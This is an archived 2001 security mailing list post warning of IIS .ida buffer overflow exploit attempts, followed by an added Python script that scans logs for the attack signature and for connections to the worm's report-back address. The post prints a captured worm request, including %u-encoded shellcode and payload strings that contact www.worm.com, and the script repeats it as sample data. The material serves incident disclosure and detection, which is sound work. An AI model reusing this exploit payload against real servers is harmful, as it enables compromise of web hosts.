Security Incidents mailing list archives
IIS .ida exploit involving worm.com / 181.com / 216.99.52.100
From: Richard Bejtlich <richard () taosecurity com>
Date: Sun, 15 Jul 2001 16:25:42 -0500
Friends in the security world,

I have recently observed multiple exploit attempts related to the "Microsoft Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability" described here:

http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D2880

It looks like successful execution of an exploit in the wild may result in the compromised machine making a connection to www.worm.com to report its status (216.99.52.100, also aliased as 181.com and chinga.com; note chinga.com also has an address of 209.81.7.23). Below is the signature of the exploit. I edited sections marked XXcensoredXX to preserve my privacy:
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml HOST:www.worm.com Accept: */* Content-length: 3569 USVWp hdGd=o `hXw pXXXxuXX3f=MZXQ<X3fPEyXB<XTxXTTHXLL:KERN3LxEL32 X4TXB LHHHLLTH;HLX<GetPLX|rocAHHXTH$3f
LTQLLLLLLLXTH LLXp Gdpu8LLLhhu!hP;CKCK4*hQ4Rp;CKCKLhhhthhShhMlLhE[SScxMQPPu&jLPhQUBPl;CKCKPd}\PPPifPtEPH,RjLPQjj;CKCK;CKCKLLLLtghm;CKCKL4LLHhPPPh9PsP:LMTHuPLAHRjh@P;CKCKLLLL0}VL;u>L`hQ%;CKCKLLRHPh@Q;CKCKjhjjjhhcP;CKCK00tth;CKCK8R;CKCK>LLLLG:8P;CKCK>LLLL|th;CKCKjd;CKCKjjj;CKCKxf|f~P[j|QxR;CKCKLLLL}7h;CKCKjjQxR;CKCKh;CKCKDPPPiYPitPti3SkttPPtPuttjd;CKCKjjj;CKCKxf|f~Ptj|RxP;CKCKjjhQxR;CKCKLEHhdddLLdtjLPMQhRxP;CKCKjjhQxR;CKCKLEHddddLLdtjLPMQdRxP;CKCKLhdddLLdtjLPhQxR;CKCKEHpLjLREHxQxR;CKCKjhPxQ;CKCKLxR;CKCK0XUWSVPj<Vhpt$(XPt$PX^[_] {xV4xV4xV4xV4xV4XPhGD$BE3LoadLibraryAGetSystemTimeCreateThreadCreateFileASleepGetSystemDefaultLangIDVirtualProtectinfocomm.dllTcpSockSendWS2_32.dllsocketconnectsendrecvclosesocketw3svc.dllGET ? HTTP/1.0
Content-type: text/xml HOST:www.worm.com Accept: */* Content-length: 3569 c:\notwormLMTH<html><head><meta http-equiv="Content-Type" content="text/html; charset=english"><title>HELLO!</title></head><bady><hr size=5><font color="red"><p align="center">Welcome to http://www.worm.com !<br><br>Hacked By Chinese!</font></hr></bady></html> HTTP/1.0 200
Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Content-Length: 90 <TITLE>Error</TITLE> <BODY> <H1>Error</H1> XXcensoredXX: Unknown WWW server.</BODY>

-----

Curious about www.worm.com, I connected to port 80 on the box and found this:
telnet www.worm.com 80 Trying 216.99.52.100... Connected to chinga.com (216.99.52.100). Escape character is '^]'. <HTML> <HEAD><META HTTP-EQUIV="REFRESH" CONTENT="0.01; URL=http://www.goto.com/d/home/p/nettcorp/lander/srchindex.jhtml">
<TITLE> Nett Corp </TITLE> </HEAD><blockquote><!-- dlogphp activated, unique hit site is 181.com. IP is XXcensored, but it was my IP addressXX. Broswer is -->
</blockquote> </BODY> </HTML> Connection closed by foreign host.

-----

You can see in the 'dlogphp activated' section that my IP address appears to have been logged. (I removed the actual IP address.)
I suggest that readers check their logs for connections to 216.99.52.100 (www.worm.com), as outbound connections MAY indicate a compromised host. I am not a Windows expert and cannot validate the exploit as recorded in my logs, but I believe you may find this warning useful.
Sincerely,
Richard Bejtlich
http://bejtlich.net

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see:
http://aris.securityfocus.com
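As an added example (not part of Richard's post or of the SecurityFocus list), here is the kind of check the post suggests, written as a small Python script: it scans web-server access log lines for the .ida request signature shown above (the long run of N characters followed by %u-encoded bytes) and scans outbound connection log lines for the 216.99.52.100 report-back address. The log formats, the internal host addresses and the timestamps are constructed sample data; only the request path, the %u sequence and the 216.99.52.100 / www.worm.com indicators come from the post.

```python
import re

# Indicators taken from the post: the .ida request with a long run of 'N'
# followed by %u-encoded payload bytes, and the report-back host/IP.
IDA_PATTERN = re.compile(r"/default\.ida\?N{50,}%u[0-9a-fA-F]{4}", re.IGNORECASE)
REPORT_HOST_IPS = {"216.99.52.100"}              # www.worm.com / 181.com / chinga.com
REPORT_HOSTNAMES = {"www.worm.com", "181.com", "chinga.com"}

# Constructed sample access log lines (common log format); the first carries the
# request signature from the post, the second is a normal request.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [15/Jul/2001:16:01:02 -0500] "GET /default.ida?' + "N" * 224
    + '%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801'
    + '%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 1523',
    '10.0.0.7 - - [15/Jul/2001:16:02:10 -0500] "GET /index.html HTTP/1.0" 200 412',
]

# Constructed sample firewall lines for outbound connections; the first goes to
# the report-back address named in the post, the second to an unrelated host.
SAMPLE_CONN_LOG = [
    "Jul 15 16:01:05 fw kernel: OUT src=192.168.1.20 dst=216.99.52.100 dport=80 proto=TCP",
    "Jul 15 16:03:11 fw kernel: OUT src=192.168.1.21 dst=192.0.2.10 dport=443 proto=TCP",
]


def find_ida_attempts(lines):
    """Return one record per access log line carrying the .ida overflow signature."""
    hits = []
    for line in lines:
        if IDA_PATTERN.search(line):
            # In common log format the first field is the client address.
            hits.append({"src": line.split()[0], "line": line})
    return hits


def find_reportback_connections(lines):
    """Return one record per outbound connection to a known report-back address or name."""
    hits = []
    for line in lines:
        dst = re.search(r"\bdst=(\S+)", line)
        if not dst:
            continue
        target = dst.group(1)
        if target in REPORT_HOST_IPS or target.lower() in REPORT_HOSTNAMES:
            src = re.search(r"\bsrc=(\S+)", line)
            hits.append({"src": src.group(1) if src else None, "dst": target, "line": line})
    return hits


def summarize(access_lines, conn_lines):
    """Combine both checks; internal hosts in the second list may be compromised."""
    return {
        "ida_attempts": find_ida_attempts(access_lines),
        "reportback_hosts": sorted({h["src"] for h in find_reportback_connections(conn_lines) if h["src"]}),
    }


if __name__ == "__main__":
    result = summarize(SAMPLE_ACCESS_LOG, SAMPLE_CONN_LOG)
    for hit in result["ida_attempts"]:
        print("exploit attempt from", hit["src"])
    for host in result["reportback_hosts"]:
        print("outbound connection to report-back address from", host)
```

Run against real logs by reading the files into the two lists; an inbound .ida hit only tells you an attempt was made, while an outbound connection to the report-back address from an IIS host is the stronger sign of a compromised machine, as the post notes.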